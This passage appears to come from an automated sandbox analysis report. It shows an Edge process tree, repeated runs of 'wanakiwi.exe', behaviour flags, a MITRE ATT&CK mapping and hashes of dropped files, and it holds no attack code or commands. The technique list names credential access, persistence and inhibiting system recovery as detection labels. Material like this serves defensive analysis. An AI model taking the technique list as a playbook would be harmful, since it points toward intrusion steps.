- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff07a746f8,0x7fff07a74708,0x7fff07a74718
2⤵
PID:5180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
2⤵
PID:5412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
2⤵
PID:5324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
2⤵
PID:6064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
2⤵
PID:5164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:1
2⤵
PID:1832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1
2⤵
PID:1144

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
2⤵
PID:636

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
2⤵
PID:5344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
2⤵
PID:5280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3760 /prefetch:8
2⤵
PID:4136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3692 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
2⤵
PID:5656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:1
2⤵
PID:3320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
2⤵
PID:5856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
2⤵
PID:5140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
2⤵
PID:2552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
2⤵
PID:6132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1
2⤵
PID:5968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
2⤵
PID:1308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1
2⤵
PID:5784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1372 /prefetch:1
2⤵
PID:4480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
2⤵
PID:4808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5712 /prefetch:8
2⤵
PID:3540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
2⤵
PID:4568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6780 /prefetch:8
2⤵
PID:5280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
2⤵
PID:5756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
2⤵
PID:312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
2⤵
PID:2532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1456 /prefetch:1
2⤵
PID:1544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
2⤵
PID:4640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7388 /prefetch:1
2⤵
PID:2440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7224 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7900 /prefetch:1
2⤵
PID:868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7772 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:1
2⤵
PID:5028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2200,15406787736416092591,11061101632786761454,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7672 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4520

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5812

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1300

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x49c 0x510
1⤵
PID:3856

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6132

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2204

C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:6136

C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe"
1⤵
PID:5448

C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe"
1⤵
PID:3528

C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe"
1⤵
PID:1272

C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe"
1⤵
PID:5544

C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe"
1⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe"
1⤵
PID:5068

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
Filesize
264KB

MD5
847cdc6e68e4f9691495795c70b29915

SHA1
4f979f100402cff6e2385eafe7ba84914dbda3f7

SHA256
e6090cfd34d0380d8c9c573d553107fdd6819ed013bdcd21c9517d06b13acbc7

SHA512
45d814f478ba9d881e98c4be02175ac01ccf5037632a0ae47e8f4df029c803d2720d5425a24690169dd8afca825498bd0e50a2654ac516b97efaef008100482e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
1KB

MD5
bc6e8e09388a37cbc6d2fdbb7688cf93

SHA1
1adc5f4f4cffe6916a7baa1247517117c30ab99f

SHA256
b432005bfa760ccdf7aec79f58757ae128f889db02f0eb1f9443993963ea52e4

SHA512
6aa102dd6fc3da9d0b50f3dfee79ec3fbf5e15e32a4da57d21069eccc94288b136650634a054f49d4358421a56a8b00fe6bc32486b7c04c6a4101813da03255a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
1KB

MD5
d1b5e4e231d7cc6731de8d69f30c644f

SHA1
2748bb62ab7a4eabe8a32d273ac18999289cea97

SHA256
97026579b01b1773a1fa577d0c1059ee4f1489fd33ddcdcc6e8fa77c77d0158e

SHA512
81e0b3040b2726be8d5bfab887eace4012cac26b679666b6bda9265c11969d8ef5e487dce27f781b6861963613f4dfee124286d27a941b11610e737840930b5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
354B

MD5
024968b9e28c333a1546c580d97e9792

SHA1
a233d03fd492c4260ea5da13a637e448f0fa50a8

SHA256
6b45935a0c94dd55986665a4387ada299463e9bb41cb75c9410fa753d62879c5

SHA512
3fccf728f5f8735eb8d7b78d79f1610d480984db9742578839588a916d4a5feca5d000738de37b790fda578ebb5907e8abe7602642b3c8a885e595553347276a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
4a9bff79f390d567a08dcfca206bae9c

SHA1
6fe1d9b693e8f32ac6655b37a32f245ad785c39c

SHA256
425e6cfab980917b377ef658a6413ffb3f00309cc4e873bc8cf0c065a0b197cc

SHA512
60088340c675d3d15caf9176698ffed0de297bae1fd77ba580d3af644a3b6b534d37013744ebb3f36c525c7d48789f5b989f3c18c5284648baadc19526d874dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
a54d4c207ba5c2119870849a5ed58228

SHA1
647362403c047a9a79a37701388a1af0dba504ed

SHA256
16465cde5710420519859e17b087ac3bbbd3925360f6be8f96a2f168472d6f3c

SHA512
6f42685bfe9925ff6aac51dd538ca82e7d367f4dbf69534216ad0eee570bf84895d61a55ae8b6a2e0fc5e57484e3d528c72250998dc091be9887eb7af78c794e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
250KB

MD5
2523bd2db98257497db56eeef7217c05

SHA1
25ec922b2bec7c552deaea2c87609d2703c9d412

SHA256
b80abdd028826a953243239c57d5015b3c2eb79f38869233077af0bc6648bedb

SHA512
745bb3a50c5fb11089be3fa404b8f57d5979f793510d776740c3d76b3940d4877ea61e568079fa9efc9e859c0dbd483983f3d370d79692c211eae5af9d2813a3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
250KB

MD5
545f0ba61c7bfef0fa478bd0ab569567

SHA1
92023dcf8e818cad33d9a3a2a77ba1380d1928e5

SHA256
fe60eb9b195d29fb57f8cc2c0ab50001de6349791659ff32f50d0aca33e9edc7

SHA512
2a23bc00be286be10c75bf743c5f409e7895fce6cf438f4b3a9fa9d0c0256e2d4059e4f5fa230be9b0f3aebe94d13c7f51c8faa2a860fa813e65589ae7321bde

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
120a75f233314ba1fe34e9d6c09f30b9

SHA1
a9f92f2d3f111eaadd9bcf8fceb3c9553753539c

SHA256
e04101215c3534dbc77c0b5df2e1d1ff74c277d2946f391f939c9a7948a22dd0

SHA512
3c4eb93e425b50e8bcc1712f4cc2be11888a0273c3a619fc6bf72ccab876a427158f661bfc80d0c1e47ef4116febf76a3aaa31a60ec662eae0e51c7f1d3d89b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
37d4afaa9fba101a49d92536193b8556

SHA1
a935d471037643e41d7d35c5a44b0935277937d0

SHA256
17c3a8c88cefb94abb78b9a9b319554eebb6061171d4f9e135a77ed634689c75

SHA512
dcd3f2a2da6041fe80357a36a9600d0de94c71712e49eb0cd990feb29c1882f59b3854ca580291d415a3ebf5d56267b6644e26ead84c84e44db8db5ba317459c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
286f685185463af5fb34120f28e027a6

SHA1
252a84902aeac74cf6252914272a91d8b9b8dd74

SHA256
7082da47a86d67d4e27bfc5c7fa6fc828915307982454e838a8caeeb348a5de6

SHA512
d9b2deea814ee4ebee802b4d8df6d74e07f1b0260136911ffe3209de4290de5e01b913c985f74c799f5b968ccc2a793bafebb7fbb1b3767e0dbab4773072665b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
bc2edd0741d97ae237e9f00bf3244144

SHA1
7c1e5d324f5c7137a3c4ec85146659f026c11782

SHA256
dbce3287c7ae69ccbd1d780c39f3ffa3c98bd4609a939fff8ee9c99f14265041

SHA512
00f505a0b4ea0df626175bf9d39a205f18f9754b62e4dba6fbb5b4a716b3539e7809723e1596bcfe1ba3041e22342e3a9cbaad88e84ce9c8c6531331bbc25093

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
Filesize
22KB

MD5
6d7565d20e6b9a137075584003626b9b

SHA1
cbf22d597e3b44f07faae2172a1c91a953554005

SHA256
781daf4e767f38eaa73e3434528e66810d748c96bd8e26ebcfa1c744e307af8d

SHA512
125ddc9d9dedcec2fc6623bab219992413158b3ca87e1c4143e09240ccb065480a4c34218259934b0e561d484c4365f084c388865900f53d31ed741af3ba8f9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f
Filesize
33KB

MD5
d0ffa4f98b5594af314ed3f23d983dd1

SHA1
14d89d19667dfd80bbac1cf462936915a1b26b1e

SHA256
1f7cf02336d4a610a67daf9a531d80feb453aeac04838f2f7ab5c5d6aea4b604

SHA512
0ade90f010290f74a15df40082a4964ec630ebcb521f2fcc8478bc1d81c93a64127ebce68a5d9373a16ee102871e76bc8e59d4a9e3fa00ea1737f7e1dd31d0ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020
Filesize
32KB

MD5
9cd0144ad69f3f18cf51e871f42c027d

SHA1
dad45cc42f9574b2ac4ade456c5dae4a38fa86ca

SHA256
4a9467359f4841bd6b50efbc83c0a527f28b54c84d9c37692021c9889b100f72

SHA512
2b47e9b5b7907c3b8598487e8b0015ce1c9b7eb4d6a7ce4680753e432015ed8bdf28bfe4bf860e6c569aa67440cb414a57d0bd6d8f8ca281914fe68a34343b1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021
Filesize
16KB

MD5
e58b47b7e15e5077a5ee28e133abb128

SHA1
34cec214231819c7bd018afe9eb32f90a87e804f

SHA256
a409fdd7c858b9bfbcd56c3e3baee44707afc21376752a08afc6a5f45f69da96

SHA512
bc0957a8c9a7bfa8574e1e8d28ab563c3608c78bf00af655798b71845a5e9edf5d3124366710c9dbc7a13e26c2bbe2139b2790a58688d5c36ff8bb7a95ade1cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022
Filesize
19KB

MD5
9462e9ad0be7632901fbd388f06a06d6

SHA1
